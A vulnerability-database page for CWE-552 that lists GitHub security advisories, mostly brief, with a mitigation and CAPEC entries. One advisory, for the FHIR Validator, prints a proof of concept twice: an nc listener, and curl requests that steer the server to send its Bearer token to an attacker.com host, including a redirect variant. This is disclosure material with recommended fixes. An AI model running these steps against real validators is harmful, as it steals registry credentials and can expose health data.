CWE-552
AllowedFiles or Directories Accessible to External Parties
Abstraction: Base · Status: Draft
The product makes files or directories accessible to unauthorized actors, even though they should not be.
669 vulnerabilities reference this CWE, most recent first.
GHSA-VQ87-XFRV-42WP
Vulnerability from github – Published: 2024-12-10 00:31 – Updated: 2024-12-11 18:30An issue was discovered in Digi ConnectPort LTS before 1.4.12. A Privilege Escalation vulnerability exists in the file upload feature. It allows an attacker on the local area network (with specific permissions) to upload and execute malicious files, potentially leading to unauthorized system access.
{
"affected": [],
"aliases": [
"CVE-2024-50627"
],
"database_specific": {
"cwe_ids": [
"CWE-552"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-12-09T22:15:22Z",
"severity": "HIGH"
},
"details": "An issue was discovered in Digi ConnectPort LTS before 1.4.12. A Privilege Escalation vulnerability exists in the file upload feature. It allows an attacker on the local area network (with specific permissions) to upload and execute malicious files, potentially leading to unauthorized system access.",
"id": "GHSA-vq87-xfrv-42wp",
"modified": "2024-12-11T18:30:41Z",
"published": "2024-12-10T00:31:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-50627"
},
{
"type": "WEB",
"url": "https://www.digi.com/getattachment/Resources/Security/Alerts/Digi-ConnectPort-LTS-Firmware-Update/ConnectPort-LTS-KB.pdf"
},
{
"type": "WEB",
"url": "https://www.digi.com/resources/documentation/digidocs/pdfs/90001001.pdf"
},
{
"type": "WEB",
"url": "https://www.digi.com/resources/security"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-VR79-8M62-WH98
Vulnerability from github – Published: 2026-03-30 17:24 – Updated: 2026-03-31 18:55Summary
The FHIR Validator HTTP service exposes an unauthenticated /loadIG endpoint that makes outbound HTTP requests to attacker-controlled URLs. Combined with a startsWith() URL prefix matching flaw in the credential provider (ManagedWebAccessUtils.getServer()), an attacker can steal authentication tokens (Bearer, Basic, API keys) configured for legitimate FHIR servers by registering a domain that prefix-matches a configured server URL.
Details
Step 1 — SSRF Entry Point (LoadIGHTTPHandler.java:35-43):
The /loadIG endpoint accepts unauthenticated POST requests with a JSON body containing an ig field. The value is passed directly to IgLoader.loadIg() with no URL validation or allowlisting. When the value is an HTTP(S) URL, IgLoader.fetchFromUrlSpecific() makes an outbound GET request via ManagedWebAccess.get():
// LoadIGHTTPHandler.java:43
engine.getIgLoader().loadIg(engine.getIgs(), engine.getBinaries(), igContent, true);
// IgLoader.java:437 (fetchFromUrlSpecific)
HTTPResult res = ManagedWebAccess.get(Arrays.asList("web"), source + "?nocache=" + System.currentTimeMillis());
Step 2 — Credential Leak via Prefix Matching (ManagedWebAccessUtils.java:14):
When ManagedWebAccess creates a SimpleHTTPClient, it attaches an authProvider that uses startsWith() to determine whether credentials should be sent:
// ManagedWebAccessUtils.java:14
if (url.startsWith(serverDetails.getUrl()) && typesMatch(serverType, serverDetails.getType())) {
return serverDetails;
}
If the server has https://packages.fhir.org configured with a Bearer token, a request to https://packages.fhir.org.attacker.com/... matches the prefix, and the token is attached to the request to the attacker's domain.
Step 3 — Redirect Amplification (SimpleHTTPClient.java:84-99,111-118):
SimpleHTTPClient manually follows redirects with setInstanceFollowRedirects(false). On each redirect hop, getHttpGetConnection() calls setHeaders() which re-evaluates authProvider.canProvideHeaders(url) against the new URL. This means even an indirect redirect path can trigger credential leakage.
PoC
Prerequisites: A FHIR Validator HTTP server running with fhir-settings.json containing:
{
"servers": [{
"url": "https://packages.fhir.org",
"authenticationType": "token",
"token": "ghp_SecretTokenForFHIRRegistry123"
}]
}
Step 1: Set up attacker credential capture server:
# On attacker machine, listen for incoming requests
nc -lp 80 > /tmp/captured_request.txt &
# Register DNS: packages.fhir.org.attacker.com -> attacker IP
Step 2: Trigger the SSRF with prefix-matching URL:
curl -X POST http://target-validator:8080/loadIG \
-H "Content-Type: application/json" \
-d '{"ig": "https://packages.fhir.org.attacker.com/malicious-ig"}'
Step 3: Verify credential capture:
cat /tmp/captured_request.txt
# Expected output includes:
# GET /malicious-ig?nocache=... HTTP/1.1
# Authorization: Bearer ghp_SecretTokenForFHIRRegistry123
# Host: packages.fhir.org.attacker.com
Redirect variant (if direct prefix match isn't possible):
# Attacker server returns: HTTP/1.1 302 Location: https://packages.fhir.org.attacker.com/steal
curl -X POST http://target-validator:8080/loadIG \
-H "Content-Type: application/json" \
-d '{"ig": "https://attacker.com/redirect"}'
Impact
- Credential theft: Attacker steals Bearer tokens, Basic auth credentials, or API keys for any configured FHIR server
- Supply chain attack: Stolen package registry credentials could be used to publish malicious FHIR packages affecting downstream consumers
- Data breach: If credentials grant access to protected FHIR endpoints (e.g., clinical data repositories), patient health records could be exposed
- Scope change (S:C): The vulnerability in the validator compromises the security of external systems (FHIR registries, package servers) whose credentials are leaked
Recommended Fix
Fix 1 — Proper URL origin comparison in ManagedWebAccessUtils (ManagedWebAccessUtils.java):
public static ServerDetailsPOJO getServer(Iterable<String> serverTypes, String url, Iterable<ServerDetailsPOJO> serverAuthDetails) {
if (serverAuthDetails != null) {
for (ServerDetailsPOJO serverDetails : serverAuthDetails) {
for (String serverType : serverTypes) {
if (urlMatchesOrigin(url, serverDetails.getUrl()) && typesMatch(serverType, serverDetails.getType())) {
return serverDetails;
}
}
}
}
return null;
}
private static boolean urlMatchesOrigin(String requestUrl, String serverUrl) {
try {
URL req = new URL(requestUrl);
URL srv = new URL(serverUrl);
return req.getProtocol().equals(srv.getProtocol())
&& req.getHost().equals(srv.getHost())
&& req.getPort() == srv.getPort()
&& req.getPath().startsWith(srv.getPath());
} catch (MalformedURLException e) {
return false;
}
}
Fix 2 — URL allowlisting in LoadIGHTTPHandler (LoadIGHTTPHandler.java):
// Add allowlist validation before loading
private static final Set<String> ALLOWED_HOSTS = Set.of(
"packages.fhir.org", "packages2.fhir.org", "build.fhir.org"
);
private boolean isAllowedSource(String ig) {
try {
URL url = new URL(ig);
return ALLOWED_HOSTS.contains(url.getHost());
} catch (MalformedURLException e) {
return false; // Not a URL, could be a package reference
}
}
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "ca.uhn.hapi.fhir:org.hl7.fhir.validation"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.9.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-34361"
],
"database_specific": {
"cwe_ids": [
"CWE-522",
"CWE-552"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-30T17:24:10Z",
"nvd_published_at": "2026-03-31T17:16:32Z",
"severity": "CRITICAL"
},
"details": "## Summary\n\nThe FHIR Validator HTTP service exposes an unauthenticated `/loadIG` endpoint that makes outbound HTTP requests to attacker-controlled URLs. Combined with a `startsWith()` URL prefix matching flaw in the credential provider (`ManagedWebAccessUtils.getServer()`), an attacker can steal authentication tokens (Bearer, Basic, API keys) configured for legitimate FHIR servers by registering a domain that prefix-matches a configured server URL.\n\n## Details\n\n**Step 1 \u2014 SSRF Entry Point** (`LoadIGHTTPHandler.java:35-43`):\n\nThe `/loadIG` endpoint accepts unauthenticated POST requests with a JSON body containing an `ig` field. The value is passed directly to `IgLoader.loadIg()` with no URL validation or allowlisting. When the value is an HTTP(S) URL, `IgLoader.fetchFromUrlSpecific()` makes an outbound GET request via `ManagedWebAccess.get()`:\n\n```java\n// LoadIGHTTPHandler.java:43\nengine.getIgLoader().loadIg(engine.getIgs(), engine.getBinaries(), igContent, true);\n\n// IgLoader.java:437 (fetchFromUrlSpecific)\nHTTPResult res = ManagedWebAccess.get(Arrays.asList(\"web\"), source + \"?nocache=\" + System.currentTimeMillis());\n```\n\n**Step 2 \u2014 Credential Leak via Prefix Matching** (`ManagedWebAccessUtils.java:14`):\n\nWhen `ManagedWebAccess` creates a `SimpleHTTPClient`, it attaches an `authProvider` that uses `startsWith()` to determine whether credentials should be sent:\n\n```java\n// ManagedWebAccessUtils.java:14\nif (url.startsWith(serverDetails.getUrl()) \u0026\u0026 typesMatch(serverType, serverDetails.getType())) {\n return serverDetails;\n}\n```\n\nIf the server has `https://packages.fhir.org` configured with a Bearer token, a request to `https://packages.fhir.org.attacker.com/...` matches the prefix, and the token is attached to the request to the attacker\u0027s domain.\n\n**Step 3 \u2014 Redirect Amplification** (`SimpleHTTPClient.java:84-99,111-118`):\n\n`SimpleHTTPClient` manually follows redirects with `setInstanceFollowRedirects(false)`. On each redirect hop, `getHttpGetConnection()` calls `setHeaders()` which re-evaluates `authProvider.canProvideHeaders(url)` against the **new URL**. This means even an indirect redirect path can trigger credential leakage.\n\n## PoC\n\n**Prerequisites:** A FHIR Validator HTTP server running with `fhir-settings.json` containing:\n```json\n{\n \"servers\": [{\n \"url\": \"https://packages.fhir.org\",\n \"authenticationType\": \"token\",\n \"token\": \"ghp_SecretTokenForFHIRRegistry123\"\n }]\n}\n```\n\n**Step 1:** Set up attacker credential capture server:\n```bash\n# On attacker machine, listen for incoming requests\nnc -lp 80 \u003e /tmp/captured_request.txt \u0026\n# Register DNS: packages.fhir.org.attacker.com -\u003e attacker IP\n```\n\n**Step 2:** Trigger the SSRF with prefix-matching URL:\n```bash\ncurl -X POST http://target-validator:8080/loadIG \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{\"ig\": \"https://packages.fhir.org.attacker.com/malicious-ig\"}\u0027\n```\n\n**Step 3:** Verify credential capture:\n```bash\ncat /tmp/captured_request.txt\n# Expected output includes:\n# GET /malicious-ig?nocache=... HTTP/1.1\n# Authorization: Bearer ghp_SecretTokenForFHIRRegistry123\n# Host: packages.fhir.org.attacker.com\n```\n\n**Redirect variant** (if direct prefix match isn\u0027t possible):\n```bash\n# Attacker server returns: HTTP/1.1 302 Location: https://packages.fhir.org.attacker.com/steal\ncurl -X POST http://target-validator:8080/loadIG \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{\"ig\": \"https://attacker.com/redirect\"}\u0027\n```\n\n## Impact\n\n- **Credential theft**: Attacker steals Bearer tokens, Basic auth credentials, or API keys for any configured FHIR server\n- **Supply chain attack**: Stolen package registry credentials could be used to publish malicious FHIR packages affecting downstream consumers\n- **Data breach**: If credentials grant access to protected FHIR endpoints (e.g., clinical data repositories), patient health records could be exposed\n- **Scope change (S:C)**: The vulnerability in the validator compromises the security of external systems (FHIR registries, package servers) whose credentials are leaked\n\n## Recommended Fix\n\n**Fix 1 \u2014 Proper URL origin comparison in ManagedWebAccessUtils** (`ManagedWebAccessUtils.java`):\n```java\npublic static ServerDetailsPOJO getServer(Iterable\u003cString\u003e serverTypes, String url, Iterable\u003cServerDetailsPOJO\u003e serverAuthDetails) {\n if (serverAuthDetails != null) {\n for (ServerDetailsPOJO serverDetails : serverAuthDetails) {\n for (String serverType : serverTypes) {\n if (urlMatchesOrigin(url, serverDetails.getUrl()) \u0026\u0026 typesMatch(serverType, serverDetails.getType())) {\n return serverDetails;\n }\n }\n }\n }\n return null;\n }\n\n private static boolean urlMatchesOrigin(String requestUrl, String serverUrl) {\n try {\n URL req = new URL(requestUrl);\n URL srv = new URL(serverUrl);\n return req.getProtocol().equals(srv.getProtocol())\n \u0026\u0026 req.getHost().equals(srv.getHost())\n \u0026\u0026 req.getPort() == srv.getPort()\n \u0026\u0026 req.getPath().startsWith(srv.getPath());\n } catch (MalformedURLException e) {\n return false;\n }\n }\n```\n\n**Fix 2 \u2014 URL allowlisting in LoadIGHTTPHandler** (`LoadIGHTTPHandler.java`):\n```java\n// Add allowlist validation before loading\nprivate static final Set\u003cString\u003e ALLOWED_HOSTS = Set.of(\n \"packages.fhir.org\", \"packages2.fhir.org\", \"build.fhir.org\"\n);\n\nprivate boolean isAllowedSource(String ig) {\n try {\n URL url = new URL(ig);\n return ALLOWED_HOSTS.contains(url.getHost());\n } catch (MalformedURLException e) {\n return false; // Not a URL, could be a package reference\n }\n}\n```",
"id": "GHSA-vr79-8m62-wh98",
"modified": "2026-03-31T18:55:51Z",
"published": "2026-03-30T17:24:10Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/hapifhir/org.hl7.fhir.core/security/advisories/GHSA-vr79-8m62-wh98"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34361"
},
{
"type": "PACKAGE",
"url": "https://github.com/hapifhir/org.hl7.fhir.core"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "FHIR Validator HTTP service has SSRF via /loadIG Chains with startsWith() Credential Leak for Authentication Token Theft"
}
GHSA-VW7P-RWG9-7MRQ
Vulnerability from github – Published: 2025-05-12 21:31 – Updated: 2025-05-12 21:31A vulnerability was discovered in Pagure server. If a malicious user were to submit a git repository with symbolic links, the server could unintentionally show incorporate and make visible content from outside the git repo.
{
"affected": [],
"aliases": [
"CVE-2024-4981"
],
"database_specific": {
"cwe_ids": [
"CWE-552"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-05-12T19:15:47Z",
"severity": "HIGH"
},
"details": "A vulnerability was discovered in Pagure server. If a malicious user were to submit a git repository with symbolic links, the server could unintentionally show incorporate and make visible content from outside the git repo.",
"id": "GHSA-vw7p-rwg9-7mrq",
"modified": "2025-05-12T21:31:09Z",
"published": "2025-05-12T21:31:09Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-4981"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2024-4981"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2278745"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2280723"
},
{
"type": "WEB",
"url": "https://pagure.io/pagure/c/454f2677bc50d7176f07da9784882eb2176537f4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-VXF8-WWPW-PHXG
Vulnerability from github – Published: 2023-05-12 12:30 – Updated: 2024-03-21 03:35An issue found in Webroot SecureAnywhere Endpoint Protection CE 23.1 v.9.0.33.39 and before allows a local attacker to access sensitive information via the EXE installer.
{
"affected": [],
"aliases": [
"CVE-2023-29820"
],
"database_specific": {
"cwe_ids": [
"CWE-552",
"CWE-668"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-05-12T11:15:12Z",
"severity": "MODERATE"
},
"details": "An issue found in Webroot SecureAnywhere Endpoint Protection CE 23.1 v.9.0.33.39 and before allows a local attacker to access sensitive information via the EXE installer.",
"id": "GHSA-vxf8-wwpw-phxg",
"modified": "2024-03-21T03:35:15Z",
"published": "2023-05-12T12:30:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-29820"
},
{
"type": "WEB",
"url": "https://www.spenceralessi.com/CVEs/2023-05-10-Webroot-SecureAnywhere"
},
{
"type": "WEB",
"url": "http://secureanywhere.com"
},
{
"type": "WEB",
"url": "http://webroot.com"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-VXXR-CWRH-FF4M
Vulnerability from github – Published: 2022-05-24 19:11 – Updated: 2022-05-24 19:11In gitit before 0.15.0.0, the Export feature can be exploited to leak information from files.
{
"affected": [],
"aliases": [
"CVE-2021-38711"
],
"database_specific": {
"cwe_ids": [
"CWE-552"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-08-16T04:15:00Z",
"severity": "HIGH"
},
"details": "In gitit before 0.15.0.0, the Export feature can be exploited to leak information from files.",
"id": "GHSA-vxxr-cwrh-ff4m",
"modified": "2022-05-24T19:11:19Z",
"published": "2022-05-24T19:11:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-38711"
},
{
"type": "WEB",
"url": "https://github.com/jgm/gitit/commit/eed32638f4f6e3b2f4b8a9a04c4b72001acf9ad8"
},
{
"type": "WEB",
"url": "https://github.com/jgm/gitit/compare/0.14.0.0...0.15.0.0"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-W2W9-635Q-99V6
Vulnerability from github – Published: 2024-07-02 09:32 – Updated: 2024-07-02 09:32Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthenticated user. The issue in versions 3.5 - 3.25 was removed in releases which dates from 10th of January 2014. Higher versions were never affected.
{
"affected": [],
"aliases": [
"CVE-2024-4836"
],
"database_specific": {
"cwe_ids": [
"CWE-552"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-07-02T09:15:19Z",
"severity": "HIGH"
},
"details": "Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthenticated user.\nThe issue in versions 3.5 - 3.25 was removed in releases which dates from 10th of January 2014. Higher versions were never affected.",
"id": "GHSA-w2w9-635q-99v6",
"modified": "2024-07-02T09:32:07Z",
"published": "2024-07-02T09:32:07Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-4836"
},
{
"type": "WEB",
"url": "https://cert.pl/en/posts/2024/07/CVE-2024-4836"
},
{
"type": "WEB",
"url": "https://cert.pl/posts/2024/07/CVE-2024-4836"
},
{
"type": "WEB",
"url": "https://www.edito.pl"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-W36W-37XX-85WG
Vulnerability from github – Published: 2023-09-30 00:31 – Updated: 2023-09-30 00:31A vulnerability was found in Xinhu RockOA 2.3.2. It has been classified as problematic. This affects the function start of the file task.php?m=sys|runt&a=beifen. The manipulation leads to exposure of backup file to an unauthorized control sphere. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-240927.
{
"affected": [],
"aliases": [
"CVE-2023-5297"
],
"database_specific": {
"cwe_ids": [
"CWE-530",
"CWE-552"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-09-29T22:15:12Z",
"severity": "LOW"
},
"details": "A vulnerability was found in Xinhu RockOA 2.3.2. It has been classified as problematic. This affects the function start of the file task.php?m=sys|runt\u0026a=beifen. The manipulation leads to exposure of backup file to an unauthorized control sphere. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-240927.",
"id": "GHSA-w36w-37xx-85wg",
"modified": "2023-09-30T00:31:10Z",
"published": "2023-09-30T00:31:10Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5297"
},
{
"type": "WEB",
"url": "https://github.com/magicwave18/vuldb/issues/2"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.240927"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.240927"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-W4JX-JW2G-XVQV
Vulnerability from github – Published: 2022-05-24 19:09 – Updated: 2022-05-24 19:09In CODESYS V3 web server before 3.5.17.10, files or directories are accessible to External Parties.
{
"affected": [],
"aliases": [
"CVE-2021-36763"
],
"database_specific": {
"cwe_ids": [
"CWE-552"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-08-03T16:15:00Z",
"severity": "HIGH"
},
"details": "In CODESYS V3 web server before 3.5.17.10, files or directories are accessible to External Parties.",
"id": "GHSA-w4jx-jw2g-xvqv",
"modified": "2022-05-24T19:09:51Z",
"published": "2022-05-24T19:09:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-36763"
},
{
"type": "WEB",
"url": "https://customers.codesys.com/index.php?eID=dumpFile\u0026t=f\u0026f=16803\u0026token=0b8edf9276dc39ee52f43026c415c5b38085d90a\u0026download="
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-W63G-VJRV-WQJC
Vulnerability from github – Published: 2022-05-18 00:00 – Updated: 2022-05-27 00:01cmseasy V7.7.5_20211012 is affected by an arbitrary file read vulnerability. After login, the configuration file information of the website such as the database configuration file (config / config_database) can be read through this vulnerability.
{
"affected": [],
"aliases": [
"CVE-2021-42644"
],
"database_specific": {
"cwe_ids": [
"CWE-552"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-05-17T12:15:00Z",
"severity": "MODERATE"
},
"details": "cmseasy V7.7.5_20211012 is affected by an arbitrary file read vulnerability. After login, the configuration file information of the website such as the database configuration file (config / config_database) can be read through this vulnerability.",
"id": "GHSA-w63g-vjrv-wqjc",
"modified": "2022-05-27T00:01:09Z",
"published": "2022-05-18T00:00:47Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-42644"
},
{
"type": "WEB",
"url": "https://jdr2021.github.io/2021/10/14/CmsEasy_7.7.5_20211012%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%86%99%E5%85%A5%E5%92%8C%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-W9MP-P2WP-2XF7
Vulnerability from github – Published: 2022-02-10 20:35 – Updated: 2021-04-22 23:05In Apache Tapestry from 5.4.0 to 5.5.0, crafting specific URLs, an attacker can download files inside the WEB-INF folder of the WAR being run.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.tapestry:tapestry-core"
},
"ranges": [
{
"events": [
{
"introduced": "5.4.0"
},
{
"fixed": "5.6.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-13953"
],
"database_specific": {
"cwe_ids": [
"CWE-552"
],
"github_reviewed": true,
"github_reviewed_at": "2021-04-22T23:05:56Z",
"nvd_published_at": "2020-09-30T18:15:00Z",
"severity": "MODERATE"
},
"details": "In Apache Tapestry from 5.4.0 to 5.5.0, crafting specific URLs, an attacker can download files inside the WEB-INF folder of the WAR being run.",
"id": "GHSA-w9mp-p2wp-2xf7",
"modified": "2021-04-22T23:05:56Z",
"published": "2022-02-10T20:35:42Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-13953"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r37dab61fc7f7088d4311e7f995ef4117d58d86a675f0256caa6991eb@%3Cusers.tapestry.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r50eb12e8a12074a9b7ed63cbab91d180d19cc23dc1da3ed5b6e1280f%40%3Cusers.tapestry.apache.org%3E"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Improper file downloads in Apache Tapestry"
}
Mitigation
When storing data in the cloud (e.g., S3 buckets, Azure blobs, Google Cloud Storage, etc.), use the provider's controls to disable public access.
CAPEC-150: Collect Data from Common Resource Locations
An adversary exploits well-known locations for resources for the purposes of undermining the security of the target. In many, if not most systems, files and resources are organized in a default tree structure. This can be useful for adversaries because they often know where to look for resources or files that are necessary for attacks. Even when the precise location of a targeted resource may not be known, naming conventions may indicate a small area of the target machine's file tree where the resources are typically located. For example, configuration files are normally stored in the /etc director on Unix systems. Adversaries can take advantage of this to commit other types of attacks.
CAPEC-639: Probe System Files
An adversary obtains unauthorized information due to improperly protected files. If an application stores sensitive information in a file that is not protected by proper access control, then an adversary can access the file and search for sensitive information.